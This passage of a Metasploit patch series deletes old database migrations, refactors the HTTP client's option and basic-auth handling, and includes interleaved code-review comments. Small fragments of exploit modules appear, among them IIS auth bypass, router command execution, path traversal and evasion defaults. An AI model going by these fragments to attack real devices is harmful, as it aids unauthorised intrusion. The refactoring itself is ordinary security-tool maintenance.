remove_index :services, :port - remove_index :services, :proto - remove_index :services, :state - remove_index :services, :name - remove_index :services, :info - - remove_index :notes, :ntype - - remove_index :vulns, :name - remove_index :vulns, :info - - remove_index :refs, :name - - remove_index :web_sites, :vhost - remove_index :web_sites, :comments - remove_index :web_sites, :options - - remove_index :web_pages, :path - remove_index :web_pages, :query - - remove_index :web_forms, :path - - remove_index :web_vulns, :path - remove_index :web_vulns, :method - remove_index :web_vulns, :name - end -end - 
diff --git a/data/sql/migrate/20110812000001_prune_indexes.rb b/data/sql/migrate/20110812000001_prune_indexes.rb deleted file mode 100755 index 54b681f273..0000000000 --- a/data/sql/migrate/20110812000001_prune_indexes.rb +++ /dev/null @@ -1,23 +0,0 @@ -class PruneIndexes < ActiveRecord::Migration - def self.up - - if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments") - remove_index :hosts, :comments - end - - if indexes(:services).map{|x| x.columns }.flatten.include?("info") - remove_index :services, :info - end - - if indexes(:vulns).map{|x| x.columns }.flatten.include?("info") - remove_index :vulns, :info - end - end - - def self.down - add_index :hosts, :comments - add_index :services, :info - add_index :vulns, :info - end -end - diff --git a/data/sql/migrate/20110922000000_expand_notes.rb b/data/sql/migrate/20110922000000_expand_notes.rb deleted file mode 100755 index 4e77303fa0..0000000000 --- a/data/sql/migrate/20110922000000_expand_notes.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandNotes < ActiveRecord::Migration - def self.up - change_column :notes, :data, :text - end - def self.down - change_column :notes, :data, :string, :limit => 65536 - end -end - diff --git a/data/sql/migrate/20110928101300_add_mod_ref_table.rb b/data/sql/migrate/20110928101300_add_mod_ref_table.rb deleted file mode 100755 index 24f16d642f..0000000000 --- a/data/sql/migrate/20110928101300_add_mod_ref_table.rb +++ /dev/null @@ -1,17 +0,0 @@ -# Probably temporary, a spot to stash module names and their associated refs -# Don't count on it being populated at any given moment. -class AddModRefTable < ActiveRecord::Migration - - def self.up - create_table :mod_refs do |t| - t.string :module, :limit => 1024 - t.string :mtype, :limit => 128 - t.text :ref - end - end - - def self.down - drop_table :mod_refs - end - -end 
diff --git a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb b/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb deleted file mode 100755 index f0c54fed98..0000000000 --- a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddDisplayNameToReportsTable < ActiveRecord::Migration - - class Report < ActiveRecord::Base - end - - def self.up - - add_column :reports, :name, :string, :limit => 63 - - # Migrate to have a default name. - - Report.find(:all).each do |report| - rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" - default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] - report.name = default_name - report.save - end - end - - def self.down - remove_column :reports, :name - end - -end diff --git a/data/sql/migrate/20111203000000_inet_columns.rb b/data/sql/migrate/20111203000000_inet_columns.rb deleted file mode 100755 index 6e86654bc5..0000000000 --- a/data/sql/migrate/20111203000000_inet_columns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class InetColumns < ActiveRecord::Migration - - def self.up - change_column :hosts, :address, 'INET using address::INET' - remove_column :hosts, :address6 - end - - def self.down - change_column :hosts, :address, :text - add_column :hosts, :address6, :text - end - -end diff --git a/data/sql/migrate/20111204000000_more_inet_columns.rb b/data/sql/migrate/20111204000000_more_inet_columns.rb deleted file mode 100755 index 56adf64625..0000000000 --- a/data/sql/migrate/20111204000000_more_inet_columns.rb +++ /dev/null 
@@ -1,17 +0,0 @@ -class MoreInetColumns < ActiveRecord::Migration - - def self.up - change_column :wmap_requests, :address, 'INET using address::INET' - remove_column :wmap_requests, :address6 - change_column :wmap_targets, :address, 'INET using address::INET' - remove_column :wmap_targets, :address6 - end - - def self.down - change_column :wmap_requests, :address, :string, :limit => 16 - add_column :wmap_requests, :address6, :string, :limit => 255 - change_column :wmap_targets, :address, :string, :limit => 16 - add_column :wmap_targets, :address6, :string, :limit => 255 - end - -end diff --git a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb b/data/sql/migrate/20111210000000_add_scope_to_hosts.rb deleted file mode 100755 index 2bbe8f9f77..0000000000 --- a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddScopeToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :scope, :text - end - - def self.down - remove_column :hosts, :scope - end -end diff --git a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb b/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb deleted file mode 100755 index 5e9833d884..0000000000 --- a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddVirtualHostToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :virtual_host, :text - end - - def self.down - remove_column :hosts, :viritual_host - end -end diff --git a/data/sql/migrate/20120411173220_rename_workspace_members.rb b/data/sql/migrate/20120411173220_rename_workspace_members.rb deleted file mode 100755 index 75003d6d36..0000000000 --- a/data/sql/migrate/20120411173220_rename_workspace_members.rb +++ /dev/null @@ -1,9 +0,0 @@ -class RenameWorkspaceMembers < ActiveRecord::Migration - def up - rename_table :project_members, :workspace_members - end - - def down - rename_table :workspace_members, :project_members - end -end 
diff --git a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb b/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb deleted file mode 100755 index fcd2f9e0ca..0000000000 --- a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddCounterCachesToHosts < ActiveRecord::Migration - - def self.up - add_column :hosts, :note_count, :integer, :default => 0 - add_column :hosts, :vuln_count, :integer, :default => 0 - add_column :hosts, :service_count, :integer, :default => 0 - - Mdm::Host.reset_column_information - Mdm::Host.all.each do |h| - Mdm::Host.reset_counters h.id, :notes - Mdm::Host.reset_counters h.id, :vulns - Mdm::Host.reset_counters h.id, :services - end - end - - def self.down - remove_column :hosts, :note_count - remove_column :hosts, :vuln_count - remove_column :hosts, :service_count - end -end \ No newline at end of file diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb deleted file mode 100755 index 0f946da39c..0000000000 --- a/data/sql/migrate/20120625000000_add_vuln_details.rb +++ /dev/null 
@@ -1,34 +0,0 @@ -class AddVulnDetails < ActiveRecord::Migration - - def self.up - create_table :vuln_details do |t| - t.integer :vuln_id # Vuln table reference - t.float :cvss_score # 0.0 to 10.0 - t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) - - t.string :title # Short identifier - t.text :description # Plain text or HTML (trusted) - t.text :solution # Plain text or HTML (trusted) - t.binary :proof # Should be UTF-8, but may not be, sanitize on output - # Technically this duplicates vuln.info, but that field - # is poorly managed / handled today. Eventually we will - # replace vuln.info - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - t.string :nx_vuln_id # 'jre-java-update-flaw' - t.float :nx_severity # 0-10 - t.float :nx_pci_severity # 0-10 - t.timestamp :nx_published # Normalized from "20081205T000000000" - t.timestamp :nx_added # Normalized from "20081205T000000000" - t.timestamp :nx_modified # Normalized from "20081205T000000000" - t.text :nx_tags # Comma separated - - end - end - - def self.down - drop_table :vuln_details - end -end diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb deleted file mode 100755 index 36e70892fa..0000000000 --- a/data/sql/migrate/20120625000001_add_host_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddHostDetails < ActiveRecord::Migration - - def self.up - create_table :host_details do |t| - t.integer :host_id # Host table reference - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - end - end - - def self.down - drop_table :host_details - end -end diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb deleted file mode 100755 index bd240ecdc5..0000000000 
--- a/data/sql/migrate/20120625000002_expand_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class ExpandDetails < ActiveRecord::Migration - - def self.up - add_column :vuln_details, :nx_vuln_status, :text - add_column :vuln_details, :nx_proof_key, :text - add_column :vuln_details, :src, :string - add_column :host_details, :src, :string - end - - def self.down - remove_column :vuln_details, :nx_vuln_status - remove_column :vuln_details, :nx_proof_key - remove_column :vuln_details, :src - remove_column :host_details, :src - end -end diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb deleted file mode 100755 index 4122503692..0000000000 --- a/data/sql/migrate/20120625000003_expand_details2.rb +++ /dev/null @@ -1,24 +0,0 @@ -class ExpandDetails2 < ActiveRecord::Migration - - def self.up - add_column :host_details, :nx_site_name, :string - add_column :host_details, :nx_site_importance, :string - add_column :host_details, :nx_scan_template, :string - add_column :host_details, :nx_risk_score, :float - - add_column :vuln_details, :nx_scan_id, :integer - add_column :vuln_details, :nx_vulnerable_since, :timestamp - add_column :vuln_details, :nx_pci_compliance_status, :string - end - - def self.down - remove_column :host_details, :nx_site_name - remove_column :host_details, :nx_site_importance - remove_column :host_details, :nx_scan_template - remove_column :host_details, :nx_risk_score - - remove_column :vuln_details, :nx_scan_id - remove_column :vuln_details, :nx_vulnerable_since - remove_column :vuln_details, :nx_pci_compliance_status - end -end diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb deleted file mode 100755 index b943fe358f..0000000000 --- a/data/sql/migrate/20120625000004_add_vuln_attempts.rb +++ /dev/null 
@@ -1,19 +0,0 @@ -class AddVulnAttempts < ActiveRecord::Migration - - def self.up - create_table :vuln_attempts do |t| - t.integer :vuln_id # Vuln table reference - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - end - end - - def self.down - drop_table :vuln_attempts - end -end diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb deleted file mode 100755 index c34101fd89..0000000000 --- a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb +++ /dev/null @@ -1,14 +0,0 @@ -class AddVulnAndHostCounterCaches < ActiveRecord::Migration - - def self.up - add_column :hosts, :host_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_attempt_count, :integer, :default => 0 - end - - def self.down - remove_column :hosts, :host_detail_count - remove_column :vulns, :vuln_detail_count - remove_column :vulns, :vuln_attempt_count - end -end diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb deleted file mode 100755 index cb99f7ee84..0000000000 --- a/data/sql/migrate/20120625000006_add_module_details.rb +++ /dev/null 
@@ -1,118 +0,0 @@ -class AddModuleDetails < ActiveRecord::Migration - - def self.up - - create_table :module_details do |t| - t.timestamp :mtime # disk modified time - t.text :file # location on disk - t.string :mtype # exploit, auxiliary, post, etc - t.text :refname # module path (no type) - t.text :fullname # module path with type - t.text :name # module title - t.integer :rank # exploit rank - t.text :description # - t.string :license # MSF_LICENSE - t.boolean :privileged # true or false - t.timestamp :disclosure_date # Mar 10 2004 - t.integer :default_target # 0 - t.text :default_action # "scan" - t.string :stance # "passive" - t.boolean :ready # true/false - end - - add_index :module_details, :refname - add_index :module_details, :name - add_index :module_details, :description - add_index :module_details, :mtype - - create_table :module_authors do |t| - t.integer :module_detail_id - t.text :name - t.text :email - end - add_index :module_authors, :module_detail_id - - create_table :module_mixins do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_mixins, :module_detail_id - - create_table :module_targets do |t| - t.integer :module_detail_id - t.integer :index - t.text :name - end - add_index :module_targets, :module_detail_id - - create_table :module_actions do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_actions, :module_detail_id - - create_table :module_refs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_refs, :module_detail_id - add_index :module_refs, :name - - create_table :module_archs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_archs, :module_detail_id - - create_table :module_platforms do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_platforms, :module_detail_id - - end - - def self.down - remove_index :module_details, :refname - remove_index :module_details, :name - remove_index :module_details, 
:description - remove_index :module_details, :mtype - - remove_index :module_authors, :module_detail_id - remove_index :module_mixins, :module_detail_id - remove_index :module_targets, :module_detail_id - remove_index :module_actions, :module_detail_id - remove_index :module_refs, :module_detail_id - remove_index :module_refs, :name - remove_index :module_archs, :module_detail_id - remove_index :module_platform, :module_detail_id - - drop_table :module_details - drop_table :module_authors - drop_table :module_mixins - drop_table :module_targets - drop_table :module_actions - drop_table :module_refs - drop_table :module_archs - drop_table :module_platforms - - end -end - -=begin - -Mdm::Host.find_by_sql(" -SELECT - hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref -FROM - hosts,vulns,vulns_refs,refs,module_refs,module_details -WHERE - hosts.id = vulns.host_id AND - vulns.id = vulns_refs.vuln_id AND - vulns_refs.ref_id = refs.id AND - refs.name = module_refs.name AND - module_refs.module_detail_id = modules_details.id -").map{|x| [x.address, x.mname, x.vname, x.vref ] } - - -=end diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb deleted file mode 100755 index 22d3ec0b1f..0000000000 --- a/data/sql/migrate/20120625000007_add_exploit_attempts.rb +++ /dev/null 
@@ -1,26 +0,0 @@ -class AddExploitAttempts < ActiveRecord::Migration - - def self.up - create_table :exploit_attempts do |t| - t.integer :host_id # Host table reference (primary) - t.integer :service_id # Service table reference (optional) - t.integer :vuln_id # Vuln table reference (optional) - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - t.integer :port # Port -> Services are created/destroyed frequently and failed - t.string :proto # Protocol | attempts may be against closed ports. - end - - add_column :hosts, :exploit_attempt_count, :integer, :default => 0 - end - - def self.down - drop_table :exploit_attempts - remove_column :hosts, :exploit_attempt_count - end -end diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb deleted file mode 100755 index 7d6dd0f96b..0000000000 --- a/data/sql/migrate/20120625000008_add_fail_message.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddFailMessage < ActiveRecord::Migration - - def self.up - add_column :vuln_attempts, :fail_detail, :text - add_column :exploit_attempts, :fail_detail, :text - end - - def self.down - remove_column :vuln_attempts, :fail_detail - remove_column :exploit_attempts, :fail_detail - end -end diff --git a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb deleted file mode 100644 index 2160e61de6..0000000000 
--- a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration - - def self.up - add_column :web_vulns, :owner, :string - add_column :web_vulns, :payload, :text - end - - def self.down - remove_column :web_vulns, :owner - remove_column :web_vulns, :payload - end - -end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index a5bdf41fef..42974b229a 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -69,7 +69,7 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [ ::File.join(Msf::Config.install_root, "data", "sql", "migrate") ] + self.migration_paths = [] self.modules_cached = false self.modules_caching = false @@ -82,6 +82,10 @@ class DBManager end initialize_database_support + + # have to set migration paths after initialize_database_support as it loads + # MetasploitDataModels. + self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end # From 902948e5d395e244165e9d5c9e00a8e3faa97f76 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:01:00 -0600 Subject: [PATCH 53/87] cleanup options --- lib/rex/proto/http/client.rb | 43 ++++------------------------ lib/rex/proto/http/client_request.rb | 3 +- 2 files changed, 8 insertions(+), 38 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 38b5c3ac2b..47fa021f4f 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
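Review bot: The added `self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s` dereferences the constant unconditionally, so it only works if `initialize_database_support` always leaves MetasploitDataModels loaded. That method's body is outside this hunk; if it can return after a failed require (for example by rescuing the load error and marking the database unusable), the constructor would now raise NameError instead of degrading to "no database". A guard such as `self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s if defined?(MetasploitDataModels)` keeps the previous failure mode. The enclosing `initialize` starts before the hunk, so this is inferred from the visible lines only.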
@@ -129,23 +129,12 @@ class Client # # @return [ClientRequest] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - + opts = self.config.merge(opts) + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - + req = ClientRequest.new(opts) end @@ -162,33 +151,13 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] ||= config['basic_auth'] || '' - opts['cookie'] ||= config['cookie'] + opts = self.config.merge(opts) + opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['data'] ||= '' - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] ||= config['raw_headers'] || '' - opts['uri'] ||= '/' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] ||= config['version'] || '1.1' - opts['vhost'] ||= config['vhost'] - opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - if opts['encode_params'] == true or opts['encode_params'].nil? - opts['encode_params'] = true - else - opts['encode_params'] = false - end - req = ClientRequest.new(opts) end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 039d11559d..c941342fe7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb 
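Review bot: `opts = self.config.merge(opts)` in `request_raw` (and again in the `request_cgi` hunk) lets an explicit nil in the caller's hash override the client config, where the removed `opts['x'] ||= config['x']` lines fell back to the config value. A caller that passes something like `'cookie' => nil` or `'vhost' => nil` now gets nil in the request, and the later `DefaultConfig.merge` will not repair it for the same reason. If the old fallback is wanted, `opts = self.config.merge(opts.reject { |_, v| v.nil? })` preserves it. The removed `encode_params` normalisation is affected too: it mapped nil to true and any other non-true value to false, and both now pass through unchanged. Separately, the trailing `req = ClientRequest.new(opts)` assigns a local that is never read; `ClientRequest.new(opts)` alone is clearer.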
@@ -27,6 +27,7 @@ class ClientRequest 'path_info' => '', 'port' => 80, 'proto' => 'HTTP', + 'query' => '', 'ssl' => false, 'uri' => '/', 'vars_get' => {}, @@ -38,7 +39,7 @@ class ClientRequest # Evasion options # 'encode_params' => true, - 'encode' => true, + 'encode' => false, 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool From 4212c36566836d99d8bf16db5dffa7dc84013d26 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:59:02 -0600 Subject: [PATCH 54/87] Fix up basic auth madness --- lib/msf/core/exploit/http/client.rb | 7 +++---- lib/rex/proto/http/client.rb | 1 - lib/rex/proto/http/client_request.rb | 6 ------ .../auxiliary/admin/http/iis_auth_bypass.rb | 2 +- .../admin/http/intersil_pass_reset.rb | 4 ++-- .../admin/http/linksys_wrt54gl_exec.rb | 4 ++-- .../admin/http/netgear_sph200d_traversal.rb | 4 ++-- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- .../auxiliary/scanner/http/http_traversal.rb | 8 +++----- .../auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- .../multi/http/netwin_surgeftp_exec.rb | 2 +- spec/lib/rex/proto/http/client_spec.rb | 20 ------------------- 12 files changed, 16 insertions(+), 46 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 5d8a48891e..6769a44b9a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -163,7 +163,6 @@ module Exploit::Remote::HttpClient nclient.set_config( 'vhost' => self.vhost(), 'agent' => datastore['UserAgent'], - 'basic_auth' => self.basic_auth, 'uri_encode_mode' => datastore['HTTP::uri_encode_mode'], 'uri_full_url' => datastore['HTTP::uri_full_url'], 'pad_method_uri_count' => datastore['HTTP::pad_method_uri_count'], 
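Review bot: The `'encode'` default in `DefaultConfig` changes from `true` to `false` with no comment, and the commit message ("cleanup options") does not mention a behaviour change. Requests built through `Client#request_raw`/`request_cgi` are unaffected, because those methods used to force `opts['encode'] ||= false`, but code that constructs `ClientRequest` directly and relied on the old default will now emit different bytes. A short comment on the line, e.g. `'encode' => false, # was true; false matches what Client#request_* always passed`, would record why the value moved.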
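Review bot: Dropping `'basic_auth' => self.basic_auth` from `set_config` here, together with the removal of the compatibility shim in the `ClientRequest#initialize` hunk of client_request.rb, means a leftover `'basic_auth'` option is now ignored without any signal. A module that was not converted to `'authorization'`, or that relied on datastore USERNAME/PASSWORD being applied automatically, will send unauthenticated requests and can report a misleading result. Rather than deleting the shim outright, `ClientRequest#initialize` could reject the stale key, e.g. `raise ArgumentError, "'basic_auth' is no longer supported; pass 'authorization'" if opts.key?('basic_auth')`, or at least log a deprecation warning. The method containing this `set_config` call starts outside the hunk.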
@@ -292,9 +291,9 @@ module Exploit::Remote::HttpClient # # Combine the user/pass into an auth string for the HTTP Client # - def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + def basic_auth(username, password) + auth_str = Rex::Text.encode_base64("#{username}:#{password}") + "Basic #{auth_str}" end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 47fa021f4f..4a8d8108f3 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -113,7 +113,6 @@ class Client # # @param opts [Hash] # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value # @option opts 'connection' [String] Connection header value # @option opts 'cookie' [String] Cookie header value # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c941342fe7..e0cdb4946f 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -87,12 +87,6 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) - - # Backwards compatibility for wonky basic authentication api from - # the dawn of time. - if opts['basic_auth'] and not opts['authorization'] - @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" - end end def to_s diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index d900abe8e7..0e051223a7 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => dir, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) vprint_status(res.body) if res 
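Review bot: The comment above `basic_auth` still reads "Combine the user/pass into an auth string for the HTTP Client", but the method now takes its credentials as arguments and returns a complete header value, so the new contract is undocumented. I would replace the summary with `# Builds the value of an HTTP Basic Authorization header` and add `@param username [String]`, `@param password [String]` and a `@return [String]` tag saying the result is "Basic " followed by the Base64 of "username:password". The comment should also state that `nil` arguments interpolate as empty strings, so the method always returns a header value, whereas the old version returned `nil` when `USERNAME` was unset. Callers therefore have to decide themselves whether credentials were supplied.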
diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 12934c9a0e..fb32e1f41c 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri'=> uri, 'method'=>'GET', - 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(Rex::Text.rand_text_alpha(127),datastore['PASSWORD']) }) if res.nil? @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', - 'basic_auth' => "admin:#{datastore['PASSWORD']}" + 'authorization' => basic_auth('admin', datastore['PASSWORD']) }) if not res diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 189f937ea1..2adf4bb5e8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) unless (res.kind_of? Rex::Proto::Http::Response) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{user}:#{pass}", + 'authorization' => basic_auth(user,pass), #'data' => data_cmd, 'vars_post' => { diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 632a991c0f..909afe5443 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(traversal, file), - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) return :abort if res.nil? diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 3f03554c15..a1bcb87489 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']) }, 25) rescue Rex::ConnectionRefused print_error("#{rhost}:#{rport} Could not connect.") diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index a5f6c194f8..eedc2a72ce 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Auxiliary source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. - To use the 'COOKIE' option, set your value like so: "name=value". To use - the 'BASICAUTH' option, set it like this: "username:password". + To use the 'COOKIE' option, set your value like so: "name=value". }, 'Author' => [ 
